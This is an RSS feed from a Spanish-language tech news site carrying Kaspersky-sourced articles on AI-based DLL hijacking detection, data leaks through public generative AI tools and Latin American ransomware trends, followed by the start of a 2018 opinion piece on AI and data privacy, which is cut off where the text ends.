<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>AI &#8211; Todo en un click</title>
	<atom:link href="https://www.todoenunclick.com/tag/ai/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.todoenunclick.com</link>
	<description>Magazine Digital de Noticias</description>
	<lastBuildDate>Mon, 20 Oct 2025 20:49:37 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
<site xmlns="com-wordpress:feed-additions:1">74029197</site>	<item>
		<title>La IA detecta ataques ocultos antes de que comprometan los sistemas de las empresas</title>
		<link>https://www.todoenunclick.com/la-ia-detecta-ataques-ocultos-antes-de-que-comprometan-los-sistemas-de-las-empresas/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Mon, 20 Oct 2025 20:49:30 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[ataques ocultos]]></category>
		<category><![CDATA[DLL hijacking]]></category>
		<category><![CDATA[IA]]></category>
		<category><![CDATA[inteligencia artificial]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101284</guid>

					<description><![CDATA[<p><img width="1500" height="1000" src="https://www.todoenunclick.com/wp-content/uploads/2025/10/IA-y-DLL.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/IA-y-DLL.jpg?w=1500&amp;ssl=1 1500w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/IA-y-DLL.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/IA-y-DLL.jpg?resize=504%2C336&amp;ssl=1 504w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/IA-y-DLL.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/IA-y-DLL.jpg?resize=630%2C420&amp;ssl=1 630w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/IA-y-DLL.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/IA-y-DLL.jpg?resize=681%2C454&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/IA-y-DLL.jpg?w=1280&amp;ssl=1 1280w" sizes="(max-width: 1500px) 100vw, 1500px" /></p><!-- wp:paragraph -->
<p>Los ataques que reemplazan archivos del sistema, conocidos como DLL hijacking, aumentaron un 207 % desde 2023. La tecnología entrenada con inteligencia artificial identifica señales casi invisibles y permite detener las amenazas a tiempo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Una tecnología potenciada por inteligencia artificial está marcando un antes y un después en la detección de amenazas, al aprender a identificar señales casi invisibles de ataque dentro de programas aparentemente seguros. Gracias a su capacidad para reconocer pequeños cambios en el comportamiento del sistema, puede anticiparse a intentos de infiltración que antes pasaban inadvertidos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Desarrollada por Kaspersky, esta tecnología fue entrenada con millones de ejemplos reales para diferenciar el funcionamiento normal de un equipo de los patrones que revelan una posible amenaza. Los primeros resultados muestran que la IA logra identificar ataques difíciles de detectar, ayudando a reforzar la protección de las empresas frente a métodos de intrusión cada vez más sofisticados.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esta innovación aborda una de las amenazas más silenciosas y extendidas en los últimos años, el secuestro de DLL (DLL hijacking). Los archivos DLL (Dynamic Link Library) son piezas fundamentales del sistema operativo, pequeñas bibliotecas que contienen instrucciones que los programas necesitan para funcionar correctamente, como abrir una ventana, conectar a internet o guardar un documento.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En un ataque de este tipo, los ciberdelincuentes crean una copia falsa de uno de esos archivos legítimos y logran que el sistema la cargue en lugar de la original. Al hacerlo, el programa de confianza ejecuta sin saberlo el código malicioso incluido dentro de esa DLL falsificada, lo que permite al atacante robar información, instalar malware o infiltrarse en la red sin dejar rastros visibles.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Desde 2023, Kaspersky ha registrado un aumento del 207 % en los incidentes de este tipo, lo que demuestra cómo la técnica se ha vuelto más común y peligrosa, utilizada tanto en campañas masivas como en operaciones de espionaje digital altamente dirigidas.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":101285,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2025/10/image-3.gif" alt="" class="wp-image-101285" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Número de ataques de secuestro de DLL y sus variaciones en 2023–2025. <strong>Fuente:</strong> Kaspersky Security Network</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El modelo de inteligencia artificial fue incorporado en Kaspersky SIEM, la plataforma que ayuda a las organizaciones a monitorear su seguridad digital en tiempo real. Allí, la herramienta analiza constantemente los archivos que los programas cargan para funcionar y detecta si alguno de ellos ha sido reemplazado o modificado de forma sospechosa.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para lograrlo, combina la información que obtiene directamente del sistema con datos globales de Kaspersky Security Network (KSN), una red que recopila y analiza millones de señales de actividad en todo el mundo. De esta forma, la tecnología puede identificar patrones de ataque con mucha mayor precisión y reducir las falsas alarmas que suelen generar los sistemas tradicionales.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Durante su fase de prueba, la IA ya mostró resultados concretos. Detectó un intento del grupo APT ToddyCat de ejecutar una herramienta, haciéndose pasar por una biblioteca del sistema, logrando bloquear el ataque antes de que causara daños. También identificó un programa malicioso conocido como infostealer, diseñado para robar contraseñas y datos personales, que se ocultaba dentro de un archivo falso. En otro caso, descubrió un archivo utilizado como cargador de malware, responsable de instalar otros programas dañinos en el sistema, escondido en una memoria USB. Estos hallazgos confirman la capacidad del modelo para descubrir señales de intrusión que antes pasaban completamente desapercibidas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Estamos viendo que los ataques de secuestro de DLL se vuelven más comunes, donde un programa de confianza es engañado para cargar una biblioteca falsa en lugar de la real. Esto permite a los atacantes ejecutar su código malicioso de forma encubierta. Esta técnica es difícil de detectar, y aquí es donde la IA puede ayudar. Usar técnicas de protección avanzadas potenciadas con IA es ahora esencial para mantenerse por delante de estas amenazas en evolución y mantener a salvo los sistemas críticos”, </em><strong>explica Fabio Assolini, director del Equipo Global de Investigación y Análisis para América Latina en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para evitar estas vulnerabilidades, los expertos de Kaspersky recomiendan:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Mantener el software y los sistemas operativos siempre actualizados</strong>, ya que las versiones más recientes corrigen fallos y brechas de seguridad que los atacantes pueden aprovechar para infiltrarse en los equipos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Descargar programas solo desde fuentes oficiales o verificadas</strong>, evitando instaladores falsos que pueden contener archivos DLL manipulados para ejecutar código malicioso.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Aplicar controles de seguridad adicionales</strong>, como limitar quién puede instalar o modificar programas y mantener bajo vigilancia los archivos más importantes del sistema. Los ciberdelincuentes suelen intentar reemplazar esos archivos por versiones falsas para infiltrarse, por lo que es clave detectar cualquier cambio inesperado a tiempo.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Usar soluciones de seguridad con inteligencia artificial, como </strong><a href="https://latam.kaspersky.com/enterprise-security/unified-monitoring-and-analysis-platform"><strong>Kaspersky SIEM</strong></a>: que analizan de forma automática y continua las bibliotecas DLL cargadas en el sistema. Esta tecnología permite identificar comportamientos sospechosos, reducir falsos positivos y detener ataques de secuestro de DLL antes de que causen daño.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>La compañía continúa evolucionando sus capacidades de protección mediante el uso de aprendizaje automático y análisis en la nube, con el objetivo de anticiparse a las técnicas emergentes de los atacantes y mantener la seguridad de infraestructuras críticas y empresas en todo el mundo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Securelist ha publicado dos artículos relacionados: <a href="https://securelist.com/building-ml-model-to-detect-dll-hijacking/117565/">el primero</a> explica cómo se desarrolló un modelo de aprendizaje automático para detectar ataques de secuestro de DLL, mientras que <a href="https://securelist.com/detecting-dll-hijacking-with-machine-learning-in-kaspersky-siem/117567/">el segundo</a> describe cómo se integró este modelo en la plataforma Kaspersky SIEM.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/la-ia-detecta-ataques-ocultos-antes-de-que-comprometan-los-sistemas-de-las-empresas/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101284</post-id>	</item>
		<item>
		<title>IA Pública, nueva puerta de fuga de datos para las empresas, alerta Kaspersky</title>
		<link>https://www.todoenunclick.com/ia-publica-nueva-puerta-de-fuga-de-datos-para-las-empresas-alerta-kaspersky/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Thu, 02 Oct 2025 14:31:06 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[Fuga datos]]></category>
		<category><![CDATA[IA]]></category>
		<category><![CDATA[IA generativa]]></category>
		<category><![CDATA[IA Pública]]></category>
		<category><![CDATA[inteligencia artificial]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101208</guid>

					<description><![CDATA[<p><img width="1500" height="1001" src="https://www.todoenunclick.com/wp-content/uploads/2025/10/AI-B2B.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/AI-B2B.jpg?w=1500&amp;ssl=1 1500w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/AI-B2B.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/AI-B2B.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/AI-B2B.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/AI-B2B.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/AI-B2B.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/AI-B2B.jpg?resize=681%2C454&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/AI-B2B.jpg?w=1280&amp;ssl=1 1280w" sizes="(max-width: 1500px) 100vw, 1500px" /></p><!-- wp:paragraph -->
<p><strong>Bases de datos y documentos críticos terminan en plataformas abiertas, poniendo en riesgo a las compañías. </strong><strong></strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El uso de la inteligencia artificial avanza como motor de productividad en América Latina; sin embargo, su adopción también plantea desafíos críticos en materia de ciberseguridad: el uso de datos internos, informes sensibles o documentos oficiales en plataformas de IA Generativa, abre la puerta a filtraciones de información confidencial, incrementando la exposición de empresas e instituciones frente al cibercrimen, alertó <strong>Claudio Martinelli, director general para las Américas en Kaspersky</strong>, y dijo que el uso de estas plataformas puede incluso derivar en una fuga masiva de información confidencial.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Hoy, los equipos de seguridad no solo tienen la presión de resguardas las redes&nbsp; corporativas ante los 467,000 objetos maliciosos que se detectan diariamente, sino también, enfrentan una realidad asociada al uso de sistemas de IA por parte de los&nbsp; empleados, quienes para ahorrar tiempo en sus tareas diarias, alimentan estas plataformas con reportes confidenciales, bases de datos o documentos y al hacerlo, comparten información a plataformas públicas que no garantizan ni la protección ni la privacidad de los datos</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Actualmente, el temor de las empresas también está relacionado con el uso que algunos empleados hacen de plataformas de IA Generativa, compartiendo en ellas datos confidenciales, es decir, </em>usan inteligencia artificial sin inteligencia humana. <em>No se trata de delegar todo a una herramienta, sino de entender los riesgos, cuidar la confidencialidad y entrenar a los empleados para que sepan cómo usar la IA”, </em>destacó <strong>Claudio Martinelli.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Recientemente se ha detectado que los sistemas de IA Generativa pueden indexar las conversaciones que han tenido con los usuarios en algunos buscadores web, dejando expuestos los chats de algunas personas en temas íntimos como su vida privada o su salud mental, lo que abre la posibilidad a que también se registren y expongan, las consultas que los empleados hacen a estas plataformas con información sensible de una empresa.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para que las empresas puedan hacer un desarrollo y despliegue seguro de los sistemas de Inteligencia Artificial, los expertos de Kaspersky recomiendan:</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":1} -->
<ol start="1" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Capacitar a los empleados en ciberseguridad:</strong> es fundamental que todos los colaboradores tengan formación continua en seguridad digital. <a href="https://asap.kaspersky.com/es">Existen herramientas</a> diseñadas para desarrollar las habilidades de los colaboradores de todos los niveles.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Efectuar un modelado de amenazas y evaluación de riesgos: </strong>Antes de implementar soluciones de IA, se recomienda identificar los posibles escenarios de ataque y medir su impacto para anticipar incidentes. <a href="https://latam.kaspersky.com/enterprise-security/threat-intelligence">Kaspersky Threat Intelligence</a> ofrece información actualizada sobre amenazas emergentes.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Contar con seguridad de la infraestructura y la nube</strong>: las configuraciones seguras y el monitoreo constante evita que vulnerabilidades técnicas sean aprovechadas por actores maliciosos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Asegurar la cadena de suministro:</strong> Las empresas deben asegurarse de que sus proveedores cumplan con altos estándares de ciberseguridad, un eslabón débil en la cadena puede poner en riesgo información sensible y afectar la continuidad del negocio.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Realizar pruebas y validación de los sistemas</strong>: Todo modelo o aplicación de IA debe someterse a evaluaciones periódicas que verifiquen su funcionamiento y confiabilidad.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Llevar a cabo reportes de vulnerabilidades periódicos: </strong>Contar con mecanismos transparentes para la notificación y gestión de fallas para corregirlas rápidamente.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Tener una defensa contra ataques específicos a modelos de aprendizaje automático</strong>: Implementar medidas de protección especializadas es esencial para garantizar la integridad de estos modelos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Asegurar actualizaciones</strong>: Mantener el software y la infraestructura actualizada con parches de seguridad es una práctica básica pero crucial para evitar incidentes.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Cumplir con estándares internacionales</strong>: Adoptar marcos normativos globales de ciberseguridad y protección de datos no solo garantiza legalidad, sino que también brinda confianza a clientes, socios e inversionistas.</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->
<p><a href="https://www.todoenunclick.com/ia-publica-nueva-puerta-de-fuga-de-datos-para-las-empresas-alerta-kaspersky/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101208</post-id>	</item>
		<item>
		<title>Crecen los ataques de ransomware en América Latina</title>
		<link>https://www.todoenunclick.com/crecen-los-ataques-de-ransomware-en-america-latina/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Tue, 13 May 2025 15:46:31 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[IA]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[Ransomware]]></category>
		<category><![CDATA[Ransomware como servicio]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=100458</guid>

					<description><![CDATA[<p><img width="2560" height="1707" src="https://www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg?w=2560&amp;ssl=1 2560w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg?resize=504%2C336&amp;ssl=1 504w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg?resize=1536%2C1024&amp;ssl=1 1536w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg?resize=2048%2C1366&amp;ssl=1 2048w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg?resize=630%2C420&amp;ssl=1 630w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg?resize=681%2C454&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/DIA-INTERNACIONAL-RANSOMWARE-scaled.jpg?w=1920&amp;ssl=1 1920w" sizes="(max-width: 2560px) 100vw, 2560px" /></p><!-- wp:paragraph -->
<p>El uso de inteligencia artificial, ataques más difíciles de detectar y el ‘ransomware como servicio’ están elevando los riesgos de seguridad para las empresas, incluidas las latinoamericanas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Con motivo del Día Internacional contra el Ransomware, que se conmemora el 12 de mayo, Kaspersky presenta su informe anual sobre la evolución del panorama global y regional de esta amenaza. Este día fue establecido en 2020 por INTERPOL en colaboración con Kaspersky para conmemorar el aniversario del ataque de ransomware WannaCry, ocurrido en 2017 y busca crear conciencia global sobre los riesgos del ransomware y promover prácticas efectivas para su prevención y respuesta.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En América Latina, la proporción de usuarios afectados por ataques de ransomware aumentó a 0,33 % entre 2023 y 2024, según datos de Kaspersky Security Network. Si bien este porcentaje puede parecer bajo, es un comportamiento típico del ransomware, ya que los cibercriminales prefieren enfocarse en objetivos de alto valor en lugar de ejecutar campañas masivas, lo que reduce el número total de incidentes, pero incrementa significativamente el impacto de cada ataque.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El informe también muestra que, a nivel global, las regiones con mayor porcentaje de usuarios atacados son Medio Oriente, Asia-Pacífico y África, seguidas por América Latina, la CEI (Comunidad de Estados Independientes) y Europa.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":100459,"sizeSlug":"full","linkDestination":"none","align":"center"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2025/05/image.png" alt="" class="wp-image-100459" /><figcaption class="wp-element-caption"><em>Proporción de usuarios cuyos equipos fueron atacados por ransomware tipo crypto, por región.</em></figcaption></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p><em>“En América Latina, vemos un aumento sostenido en los ataques de ransomware, especialmente en países como Brasil, Argentina, Chile y México. Sectores estratégicos como manufactura, gobierno, agricultura, energía y retail se han convertido en objetivos frecuentes. Si bien las limitaciones económicas y los rescates relativamente bajos pueden disuadir a ciertos actores, la acelerada transformación digital en la región amplía la superficie de ataque y expone a más organizaciones a este tipo de amenazas”</em>, <strong>asegura Fabio Assolini, director del Equipo Global de Investigación y Análisis (GReAT) para América Latina en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Tendencias actuales y nuevas formas de ransomware</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>El uso de inteligencia artificial en los ataques de ransomware está creciendo rápidamente</strong>. Un ejemplo es FunkSec, un grupo que apareció a finales de 2024 y que en poco tiempo superó a bandas conocidas como Cl0p y RansomHub, acumulando muchas víctimas solo en diciembre. FunkSec opera bajo un modelo llamado “Ransomware como Servicio” (RaaS), donde crean programas maliciosos y los ofrecen a otros delincuentes a cambio de una parte del rescate. Además, usan inteligencia artificial para desarrollar su ransomware, generando códigos complejos de forma más rápida y difícil de detectar. A diferencia de otros grupos que piden millones, FunkSec exige montos más bajos, pero ataca a muchas más víctimas, lo que hace más rentable su operación.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Este modelo de “ransomware como servicio” sigue siendo la forma más común de ataque</strong>, porque permite que incluso personas con pocos conocimientos técnicos puedan lanzar ataques sofisticados. En 2024, plataformas como RansomHub ofrecían todo lo necesario: el programa malicioso, ayuda técnica y una forma de repartir el dinero del rescate. Esto hizo que aparecieran muchos nuevos grupos de ransomware durante el año.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Para 2025, se espera que los ataques de ransomware sean aún más creativos y difíciles de detectar</strong>. Por ejemplo, el grupo Akira logró ingresar a redes internas de empresas utilizando una <a href="https://www.bleepingcomputer.com/news/security/ransomware-gang-encrypted-network-from-a-webcam-to-bypass-edr/">cámara web</a> común para evitar los sistemas de seguridad. Los ciberdelincuentes están buscando nuevas formas de entrar, como usando electrodomésticos inteligentes, dispositivos conectados a internet o equipos de oficina mal configurados. A medida que las empresas mejoran sus sistemas de defensa, los atacantes están afinando sus métodos para moverse silenciosamente dentro de las redes y causar el mayor daño posible sin ser detectados a tiempo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Otro riesgo creciente es el uso de modelos de inteligencia artificial (LLM por sus siglas en inglés) entrenada especialmente para el cibercrimen</strong>. En la dark web ya se venden herramientas que permiten a cualquier persona crear virus, correos falsos o mensajes engañosos con solo unos clics. También se están usando tecnologías como <a href="https://www.ibm.com/think/topics/rpa">la automatización robótica (RPA)</a> o plataformas visuales de desarrollo rápido (LowCode), que permiten crear software de forma muy sencilla. Estas mismas herramientas podrían ser aprovechadas por los delincuentes para lanzar ataques aún más rápidos y frecuentes.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“El ransomware es una de las amenazas de ciberseguridad más urgentes que enfrentan las organizaciones actualmente. Los atacantes están apuntando a empresas de todos los tamaños y en todas las regiones del mundo. En nuestro informe destacamos un cambio preocupante: los ciberdelincuentes están aprovechando puntos de entrada que suelen pasarse por alto, como dispositivos conectados a internet (IoT), electrodomésticos inteligentes y equipos de oficina mal configurados o desactualizados. Estos puntos débiles muchas veces no se monitorean, lo que los convierte en blancos fáciles. Para mantenerse protegidas, las organizaciones necesitan una defensa en capas que incluya sistemas actualizados, segmentación de red, monitoreo en tiempo real, copias de seguridad sólidas y educación continua para los usuarios. Crear conciencia cibernética en todos los niveles es tan importante como invertir en la tecnología adecuada”, </em><strong>agrega Assolini.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Kaspersky recomienda a las organizaciones seguir estas buenas prácticas para protegerse de este tipo de amenazas:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Activa la protección contra ransomware en todos los endpoints. Kaspersky ofrece de forma gratuita una <a href="https://www.kaspersky.com/anti-ransomware-tool">herramienta anti-ransomware</a> para empresas, que protege computadoras y servidores frente a este tipo de malware, previene vulnerabilidades y es compatible con otras soluciones de seguridad ya instaladas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Mantén siempre actualizado el software en todos los dispositivos que utilices, para evitar que los atacantes aprovechen fallas de seguridad y se infiltren en tu red.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Centra tu estrategia de defensa en detectar movimientos laterales y exfiltración de datos hacia internet. Revisa el tráfico saliente para identificar conexiones sospechosas con ciberdelincuentes. Configura copias de seguridad offline que no puedan ser alteradas por intrusos y asegúrate de poder acceder a ellas rápidamente en caso de emergencia.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Instala soluciones anti-APT y EDR que permitan descubrir amenazas avanzadas, investigarlas y resolver incidentes a tiempo. Brinda a tu equipo de seguridad (SOC) acceso a inteligencia de amenazas actualizada y capacítalos regularmente con entrenamientos profesionales. Todo esto está incluido en el marco de seguridad avanzada de <a href="https://www.kaspersky.com/enterprise-security">Kaspersky Expert Security Framework</a></li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Mantente al tanto de las tácticas, técnicas y procedimientos (TTPs) que están usando los actores maliciosos, utilizando información de <a href="https://latam.kaspersky.com/enterprise-security/threat-intelligence">inteligencia de amenazas</a> actualizada.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Para proteger a tu empresa frente a un amplio rango de amenazas, utiliza soluciones de la línea <a href="https://latam.kaspersky.com/next">Kaspersky Next</a>, que ofrecen protección en tiempo real, visibilidad de amenazas y capacidades de investigación y respuesta (EDR y XDR) para organizaciones de todos los tamaños e industrias. Puedes elegir el nivel de producto que mejor se adapte a tus necesidades actuales y cambiar fácilmente si tus requerimientos cambian en el futuro.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Para conocer más sobre las tendencias de ransomware en 2025, consulta el informe completo en <a href="https://securelist.lat/state-of-ransomware-in-2025/99978/">Securelist.com</a> </p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/crecen-los-ataques-de-ransomware-en-america-latina/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">100458</post-id>	</item>
		<item>
		<title>Inteligencia artificial: ¿cómo queda la privacidad y la seguridad de mis datos?</title>
		<link>https://www.todoenunclick.com/inteligencia-artificial-como-queda-la-privacidad-y-la-seguridad-de-mis-datos/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Tue, 03 Apr 2018 16:22:32 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[datos]]></category>
		<category><![CDATA[inteligencia artificial]]></category>
		<category><![CDATA[opinión]]></category>
		<category><![CDATA[privacidad]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[TOTVS]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=86410</guid>

					<description><![CDATA[<p><img width="1024" height="678" src="https://www.todoenunclick.com/wp-content/uploads/2018/04/Weber-Canova.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Inteligencia artificial: ¿cómo queda la privacidad y la seguridad de mis datos?" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/04/Weber-Canova.jpg?w=1024&amp;ssl=1 1024w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/04/Weber-Canova.jpg?resize=242%2C160&amp;ssl=1 242w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/04/Weber-Canova.jpg?resize=768%2C509&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/04/Weber-Canova.jpg?resize=507%2C336&amp;ssl=1 507w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/04/Weber-Canova.jpg?resize=634%2C420&amp;ssl=1 634w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/04/Weber-Canova.jpg?resize=640%2C424&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2018/04/Weber-Canova.jpg?resize=681%2C451&amp;ssl=1 681w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></p>La velocidad de surgimiento de nuevas tecnologías y de adopción de ellas es cada vez mayor. Esta evolución trae un crecimiento exponencial de superficies posibles de ataques, al mismo tiempo que ofrece innumerables oportunidades a las empresas. Ante el inmenso volumen 